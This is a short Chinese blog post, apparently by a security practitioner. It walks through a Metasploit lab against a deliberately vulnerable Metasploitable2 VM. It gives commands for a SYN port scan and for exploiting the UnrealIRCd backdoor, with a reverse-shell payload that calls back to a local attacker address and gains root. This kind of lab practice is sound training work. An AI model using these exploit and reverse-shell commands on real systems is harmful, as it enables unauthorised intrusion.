网络安全防御实战--蓝军武器库是2020年出版的，已经过去3年时间了，最近利用闲暇时间，抓紧吸收，总的来说，第10章开始学习利用metasploit渗透测试工具去打metasploit2虚拟机，本文我演示了metasploit端口扫描和漏洞利用，更多有趣的渗透测试实验，有待大家挖掘~

• ailx10：metasploit渗透测试入门
• ailx10：使用metasploit获取域散列值
• ailx10：Meterpreter渗透测试入门

ailx10

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

1、启动metasploitable2虚拟机，拿到IP地址（192.168.85.171）

2、访问web页面，里面有很多白帽子黑客练习的靶场

3、使用root 身份 运行 kali 的 msfconsole ，对metasploitable2进行syn端口扫描

search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.85.171

4、查看syn端口扫描结果，体验很慢，不如 nmap

5、漏洞利用，直接帮忙提权到root了，成功获得metasploitable2 后门

use exploit/unix/irc/unreal_ircd_3281_backdoorset RHOSTS 192.168.85.171
set payload generic/shell_reverse_tcp
set payload cmd/unix/reverse
set lhost 192.168.85.23
run

编辑于 2023-03-24 21:47・IP 属地江苏